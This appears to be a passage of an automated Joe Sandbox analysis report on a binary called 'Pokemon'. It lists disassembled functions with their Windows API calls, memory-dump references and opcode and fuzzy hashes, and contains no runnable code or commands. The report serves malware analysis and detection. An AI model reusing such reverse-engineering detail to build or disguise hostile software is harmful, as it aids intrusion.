                                                                                                                                                                                                                                                                                      • Instruction ID: b19147076c0f4a58dae22daa36ee40072517a25ceff6b4a67c48d1d6a68f0413
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d02c2a283c112925df090cb711de51f2c36d595f35f9461ae8ff560c8ed36233
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 985136B5A00619EFDB14DF68D884EAAB7F8FF89314B158559EA09DB310E730E911CF90
                                                                                                                                                                                                                                                                                      Function 00109540 Relevance: 7.6, APIs: 5, Instructions: 143COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 001095F3
                                                                                                                                                                                                                                                                                      • GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 0010961F
                                                                                                                                                                                                                                                                                      • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00109677
                                                                                                                                                                                                                                                                                      • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 0010969C
                                                                                                                                                                                                                                                                                      • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 001096A4
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: PrivateProfile$SectionWrite$String
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2832842796-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 6905a5fee37f12909ee6fcbbe49cb0ebfbfe213ea6dd552d08bac4bc5d5094ae
                                                                                                                                                                                                                                                                                      • Instruction ID: 86d3b8178f05d8a648bdd0be8756456f49692de1e78c12b92bd69df5aa067313
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6905a5fee37f12909ee6fcbbe49cb0ebfbfe213ea6dd552d08bac4bc5d5094ae
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0D512835A00215EFCF15DF65C891AAABBF5FF49314F088058E849AB3A2CB75ED41DB90
                                                                                                                                                                                                                                                                                      Function 00119941 Relevance: 7.6, APIs: 5, Instructions: 143libraryloaderCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • LoadLibraryW.KERNEL32(?,00000000,?), ref: 0011999D
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00119A2D
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00119A49
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00119A8F
                                                                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 00119AAF
                                                                                                                                                                                                                                                                                        • Part of subcall function 000AF9D4: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00101A02,?,7529E610), ref: 000AF9F1
                                                                                                                                                                                                                                                                                        • Part of subcall function 000AF9D4: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,000F0354,00000000,00000000,?,?,00101A02,?,7529E610,?,000F0354), ref: 000AFA18
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 666041331-0
                                                                                                                                                                                                                                                                                      • Opcode ID: ffb3e22146f12424fce915a6481ccf3e141d9da6ab76274371b3924fdf4ccaa1
                                                                                                                                                                                                                                                                                      • Instruction ID: 3b8b529ab534816e40a39301452855c6d812ff392a73df86e9c6d4fdcaf92609
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ffb3e22146f12424fce915a6481ccf3e141d9da6ab76274371b3924fdf4ccaa1
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 69513835A01205DFDB15DF68D494CE9BBF0FF09314B1980A9E81A9B762D731ED86CB81
                                                                                                                                                                                                                                                                                      Function 001275AE Relevance: 7.6, APIs: 5, Instructions: 131windowCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • SetWindowLongW.USER32(00000002,000000F0,?), ref: 0012766B
                                                                                                                                                                                                                                                                                      • SetWindowLongW.USER32(?,000000EC,?), ref: 00127682
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 001276AB
                                                                                                                                                                                                                                                                                      • ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,0010B5BE,00000000,00000000), ref: 001276D0
                                                                                                                                                                                                                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 001276FF
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Window$Long$MessageSendShow
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3688381893-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 5a23e2fd30b9584a8e6d669ce800f82c571f15c03eb8ce16802899e5daa8671b
                                                                                                                                                                                                                                                                                      • Instruction ID: d05fd22a1ca0286b0f8e000090594e1357531dc98ea7be3282c6c7d325321997
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5a23e2fd30b9584a8e6d669ce800f82c571f15c03eb8ce16802899e5daa8671b
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3241D235A08524AFE729CF2CEC48FA77BA5FB49350F150264F819A72E0D770AD61DA50
                                                                                                                                                                                                                                                                                      Function 000C23C1 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: _free
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 269201875-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 5bab08734a93963cfa8959e77e246e8bf7ffd76408ab0245f568ef334dfe3264
                                                                                                                                                                                                                                                                                      • Instruction ID: 4a480bff90d41c7ac17d01cb9f469ddd576243a9dcd2faf331cd0c8e08317175
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5bab08734a93963cfa8959e77e246e8bf7ffd76408ab0245f568ef334dfe3264
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B3419F32A002009BDB24DF78C881E9EB7F5EF89314B15856DE515EB692D631ED418B81
                                                                                                                                                                                                                                                                                      Function 001042B9 Relevance: 7.6, APIs: 5, Instructions: 101windowCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetInputState.USER32 ref: 00104310
                                                                                                                                                                                                                                                                                      • TranslateAcceleratorW.USER32(?,00000000,?), ref: 00104367
                                                                                                                                                                                                                                                                                      • TranslateMessage.USER32(?), ref: 00104390
                                                                                                                                                                                                                                                                                      • DispatchMessageW.USER32(?), ref: 0010439A
                                                                                                                                                                                                                                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 001043AB
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2256411358-0
                                                                                                                                                                                                                                                                                      • Opcode ID: eae7736a8ead029c97a32cba18030d55bc68a69586b6f961de2fbb6b4dc9e929
                                                                                                                                                                                                                                                                                      • Instruction ID: ed0fb93a91d53d498c127968db08b45fdbe2daf7c60cd8adc1aebdb97da27d58
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: eae7736a8ead029c97a32cba18030d55bc68a69586b6f961de2fbb6b4dc9e929
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 483195B0904755DFEB38DB74EC89BB637A8BB01308F041569E6E2C65E0E7F49495CB21
                                                                                                                                                                                                                                                                                      Function 000F224E Relevance: 7.6, APIs: 5, Instructions: 93sleepwindowCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 000F2262
                                                                                                                                                                                                                                                                                      • PostMessageW.USER32(00000001,00000201,00000001), ref: 000F230E
                                                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000000,?,?,?), ref: 000F2316
                                                                                                                                                                                                                                                                                      • PostMessageW.USER32(00000001,00000202,00000000), ref: 000F2327
                                                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000000,?,?,?,?), ref: 000F232F
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: MessagePostSleep$RectWindow
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3382505437-0
                                                                                                                                                                                                                                                                                      • Opcode ID: a526dca01b5cacb831b71161545246ee1d8f6bf3b09a92fc0d6cf04de24815a0
                                                                                                                                                                                                                                                                                      • Instruction ID: 0455ff7200b6c857ad141dcf4a0e26fb8a7d7390110eebe286d246bf9fd0fc25
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a526dca01b5cacb831b71161545246ee1d8f6bf3b09a92fc0d6cf04de24815a0
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4431A27190021DEFDB14CFA8DD89AEE3BB5EB04315F104225FA25A76D0C7709954EB91
                                                                                                                                                                                                                                                                                      Function 0010D95F Relevance: 7.6, APIs: 5, Instructions: 93networkfileCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,0010CC63,00000000), ref: 0010D97D
                                                                                                                                                                                                                                                                                      • InternetReadFile.WININET(?,00000000,?,?), ref: 0010D9B4
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00000000,?,?,?,0010CC63,00000000), ref: 0010D9F9
                                                                                                                                                                                                                                                                                      • SetEvent.KERNEL32(?,?,00000000,?,?,?,0010CC63,00000000), ref: 0010DA0D
                                                                                                                                                                                                                                                                                      • SetEvent.KERNEL32(?,?,00000000,?,?,?,0010CC63,00000000), ref: 0010DA37
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: EventInternet$AvailableDataErrorFileLastQueryRead
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3191363074-0
                                                                                                                                                                                                                                                                                      • Opcode ID: cf177932f4346549f167bf9a46a4a02b8ec4edd258907750b3c7ac36b5c41b50
                                                                                                                                                                                                                                                                                      • Instruction ID: f7910c59b60f5cbdeab818fee36a9123f7c608a28f336e5383b4186e64c44882
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cf177932f4346549f167bf9a46a4a02b8ec4edd258907750b3c7ac36b5c41b50
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 45314C71604205FFDB24DFE9E884AABB7F8EF04354B10842EE586D3190DBB0AE419B60
                                                                                                                                                                                                                                                                                      Function 001261A5 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001053,000000FF,?), ref: 001261E4
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001074,?,00000001), ref: 0012623C
                                                                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 0012624E
                                                                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 00126259
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 001262B5
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: MessageSend$_wcslen
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 763830540-0
                                                                                                                                                                                                                                                                                      • Opcode ID: c7086709f9a73f03d0d53df9ef09dbc5b47afe9eec72a6deaee2392d946bbcc7
                                                                                                                                                                                                                                                                                      • Instruction ID: 064bb77f93dfc464df7a92ff031a9f2ece9009bcfa09d1c738c89924e575dd2b
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c7086709f9a73f03d0d53df9ef09dbc5b47afe9eec72a6deaee2392d946bbcc7
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DE218271900268AADB21DFA4EC84EEE7BB9FF44724F104216FA25EB1C1D77099A5CF50
                                                                                                                                                                                                                                                                                      Function 0011138D Relevance: 7.6, APIs: 5, Instructions: 69COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • IsWindow.USER32(00000000), ref: 001113AE
                                                                                                                                                                                                                                                                                      • GetForegroundWindow.USER32 ref: 001113C5
                                                                                                                                                                                                                                                                                      • GetDC.USER32(00000000), ref: 00111401
                                                                                                                                                                                                                                                                                      • GetPixel.GDI32(00000000,?,00000003), ref: 0011140D
                                                                                                                                                                                                                                                                                      • ReleaseDC.USER32(00000000,00000003), ref: 00111445
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Window$ForegroundPixelRelease
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 4156661090-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 9be5a88f3c98c2cac707d6e375b9a149cf14e884c34aac0ad3c87896c95f0f1e
                                                                                                                                                                                                                                                                                      • Instruction ID: 8dffc26681865ccc4e11d5c0cbb16fe3ca2b7ec83467ed376b032ace68952944
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9be5a88f3c98c2cac707d6e375b9a149cf14e884c34aac0ad3c87896c95f0f1e
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E9218E36A00204AFDB14EF65D888A9EB7F5FF48350B048439E85A97791CB70AC41DB90
                                                                                                                                                                                                                                                                                      Function 000CD13D Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetEnvironmentStringsW.KERNEL32 ref: 000CD146
                                                                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 000CD169
                                                                                                                                                                                                                                                                                        • Part of subcall function 000C3B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,000B6A79,?,0000015D,?,?,?,?,000B85B0,000000FF,00000000,?,?), ref: 000C3BC5
                                                                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 000CD18F
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 000CD1A2
                                                                                                                                                                                                                                                                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 000CD1B1
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 336800556-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 2d5c384d4f41817765fcfeb827f9f9462935eb710ff69eb2cb5b18e6d50d4080
                                                                                                                                                                                                                                                                                      • Instruction ID: dc6050e114ffc4efeae354c428dd11c2ba6a0a1520a886f49a7c4d959da334fc
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2d5c384d4f41817765fcfeb827f9f9462935eb710ff69eb2cb5b18e6d50d4080
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3B0171766026157F23316766AC88E7F6AADEFC2B61318013EBD09C6245DA608D0291B1
                                                                                                                                                                                                                                                                                      Function 000F6078 Relevance: 7.6, APIs: 5, Instructions: 61COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: _memcmp
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2931989736-0
                                                                                                                                                                                                                                                                                      • Opcode ID: b56f4ca5d5d04ab6b11acfead640659b8270aa2b1788e9c44d91feb1eb4dedfb
                                                                                                                                                                                                                                                                                      • Instruction ID: 7e11a63a910af56206c54267d5a065cdae7d5e3c828c3ee2295d31aa2a4e56a1
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b56f4ca5d5d04ab6b11acfead640659b8270aa2b1788e9c44d91feb1eb4dedfb
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9601B5B164430D7BD62456209C62FFB73AD9F59398F244021FE099BA43EF63ED10D2A1
                                                                                                                                                                                                                                                                                      Function 000C316B Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(0000000A,?,?,000BF64E,000B545F,0000000A,?,00000000,00000000,?,00000000,?,?,?,0000000A,00000000), ref: 000C3170
